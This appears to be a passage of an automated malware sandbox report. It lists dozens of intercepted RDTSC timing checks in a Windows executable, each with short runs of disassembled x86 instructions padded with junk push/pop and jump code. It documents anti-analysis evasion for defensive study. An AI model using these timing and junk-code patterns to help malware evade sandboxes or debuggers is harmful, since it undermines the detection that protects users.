Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF8F second address: C0DF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0C862 second address: C0C884 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC22D01ECC6h 0x00000008 jmp 00007FC22D01ECD3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0C884 second address: C0C88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0CB14 second address: C0CB1E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC22D01ECCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0CDB1 second address: C0CDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 jl 00007FC22CC1B8AAh 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC22CC1B8B7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DC78 second address: C0DC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FC22D01ECD0h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C11607 second address: C11612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC22CC1B8A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BBEB second address: C2BC18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC22D01ECCEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC22D01ECD9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BC18 second address: C2BC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BA5F second address: C2BA76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC22D01ECD0h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BA76 second address: C2BA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d ja 00007FC22CC1B8BAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BA9D second address: C2BAA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2E813 second address: C2E81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2E81D second address: C2E82B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2E82B second address: C2E842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22CC1B8B1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C30873 second address: C30880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FC22D01ECC6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C30880 second address: C30884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C30884 second address: C3088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C3088A second address: C3088F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C303F5 second address: C303F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C303F9 second address: C3040C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC22CC1B8ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C3040C second address: C3041A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C3041A second address: C30420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45735 second address: C4573B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45884 second address: C4588B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C4588B second address: C45891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45891 second address: C45896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45896 second address: C4589C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C4589C second address: C458A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C458A2 second address: C458D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jmp 00007FC22D01ECD8h 0x0000000f jmp 00007FC22D01ECCAh 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C458D2 second address: C458DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C458DB second address: C458EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45A58 second address: C45A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45A65 second address: C45A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45D39 second address: C45D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 ja 00007FC22CC1B8B6h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45EDB second address: C45EF9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC22D01ECD2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45EF9 second address: C45EFE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C4604E second address: C46052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C46052 second address: C46058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C46058 second address: C46064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC22D01ECC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C46064 second address: C46068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C46068 second address: C4606C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C4606C second address: C46092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC22CC1B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FC22CC1B8ACh 0x00000016 jmp 00007FC22CC1B8AAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C491BF second address: C491C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C492BA second address: C492C4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C492C4 second address: C492CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C492CA second address: C492CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5C103 second address: B5C107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5120437 second address: 51204CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007FC22CC1B8AAh 0x0000000c or ax, 6F98h 0x00000011 jmp 00007FC22CC1B8ABh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC22CC1B8B4h 0x00000022 adc esi, 780699F8h 0x00000028 jmp 00007FC22CC1B8ABh 0x0000002d popfd 0x0000002e mov ch, 63h 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 pushad 0x00000034 mov dx, 77D4h 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007FC22CC1B8B3h 0x0000003f sub ecx, 33370A6Eh 0x00000045 jmp 00007FC22CC1B8B9h 0x0000004a popfd 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e popad 0x0000004f mov edx, dword ptr [ebp+0Ch] 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51204CE second address: 51204D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 512056F second address: 5120587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150774 second address: 5150820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC22D01ECCFh 0x00000009 jmp 00007FC22D01ECD3h 0x0000000e popfd 0x0000000f movzx eax, dx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebp 0x00000016 jmp 00007FC22D01ECD0h 0x0000001b mov dword ptr [esp], ebp 0x0000001e jmp 00007FC22D01ECD0h 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC22D01ECCEh 0x0000002c jmp 00007FC22D01ECD5h 0x00000031 popfd 0x00000032 mov dx, ax 0x00000035 popad 0x00000036 xchg eax, ecx 0x00000037 jmp 00007FC22D01ECCAh 0x0000003c push eax 0x0000003d jmp 00007FC22D01ECCBh 0x00000042 xchg eax, ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FC22D01ECD5h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150820 second address: 5150844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4B739FA2h 0x00000008 mov edi, 0F1013EEh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC22CC1B8B1h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150844 second address: 515088D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d mov ax, 2C03h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 lea eax, dword ptr [ebp-04h] 0x00000019 pushad 0x0000001a movzx eax, bx 0x0000001d mov ebx, 29D597DCh 0x00000022 popad 0x00000023 push ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC22D01ECD7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150930 second address: 5150934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150934 second address: 5150951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150998 second address: 51509EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b pushad 0x0000000c jmp 00007FC22CC1B8ACh 0x00000011 jmp 00007FC22CC1B8B2h 0x00000016 popad 0x00000017 pop esi 0x00000018 jmp 00007FC22CC1B8B0h 0x0000001d leave 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51509EE second address: 51509F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51509F3 second address: 5150A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A09 second address: 5150A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A0D second address: 514002C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007FC22CC1BA0Ah 0x0000001a mov dword ptr [esp], 0000000Dh 0x00000021 call 00007FC2313D7A41h 0x00000026 mov edi, edi 0x00000028 jmp 00007FC22CC1B8B0h 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FC22CC1B8B7h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514002C second address: 51400C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECCFh 0x00000008 push esi 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC22D01ECCBh 0x00000015 sub cx, 636Eh 0x0000001a jmp 00007FC22D01ECD9h 0x0000001f popfd 0x00000020 mov ax, 24F7h 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FC22D01ECD8h 0x0000002d add esi, 21A48A18h 0x00000033 jmp 00007FC22D01ECCBh 0x00000038 popfd 0x00000039 jmp 00007FC22D01ECD8h 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 mov edi, eax 0x00000046 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51400C2 second address: 51400C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51400C6 second address: 514010D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, cx 0x00000009 popad 0x0000000a sub esp, 2Ch 0x0000000d jmp 00007FC22D01ECD0h 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC22D01ECCEh 0x0000001a or ecx, 717EDE08h 0x00000020 jmp 00007FC22D01ECCBh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 mov ecx, 3A80EC95h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514010D second address: 5140111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140111 second address: 5140134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FC22D01ECD1h 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, bx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140134 second address: 51401A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC22CC1B8B0h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FC22CC1B8ABh 0x0000000f sbb ah, 0000005Eh 0x00000012 jmp 00007FC22CC1B8B9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c jmp 00007FC22CC1B8AEh 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FC22CC1B8ACh 0x0000002b sub ax, 8788h 0x00000030 jmp 00007FC22CC1B8ABh 0x00000035 popfd 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51401E2 second address: 51401E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51401E8 second address: 5140297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FC22CC1B8AAh 0x00000013 add si, 3EA8h 0x00000018 jmp 00007FC22CC1B8ABh 0x0000001d popfd 0x0000001e pop ecx 0x0000001f call 00007FC22CC1B8B9h 0x00000024 pushfd 0x00000025 jmp 00007FC22CC1B8B0h 0x0000002a or eax, 1A50EC38h 0x00000030 jmp 00007FC22CC1B8ABh 0x00000035 popfd 0x00000036 pop esi 0x00000037 popad 0x00000038 mov edi, 00000000h 0x0000003d pushad 0x0000003e mov edx, esi 0x00000040 mov ecx, 53A136BDh 0x00000045 popad 0x00000046 inc ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a pushad 0x0000004b popad 0x0000004c pushfd 0x0000004d jmp 00007FC22CC1B8ABh 0x00000052 xor cx, AEAEh 0x00000057 jmp 00007FC22CC1B8B9h 0x0000005c popfd 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140297 second address: 514029D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514029D second address: 51402B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop ebx 0x0000000f jmp 00007FC22CC1B8ACh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51402B9 second address: 51402BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51402BF second address: 51402C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51402C3 second address: 5140302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FC22D01EE4Dh 0x00000011 pushad 0x00000012 mov cx, bx 0x00000015 popad 0x00000016 lea ecx, dword ptr [ebp-14h] 0x00000019 jmp 00007FC22D01ECD5h 0x0000001e mov dword ptr [ebp-14h], edi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140302 second address: 5140306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140306 second address: 514030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514030A second address: 5140310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51403C8 second address: 51403CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51403CC second address: 51403E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
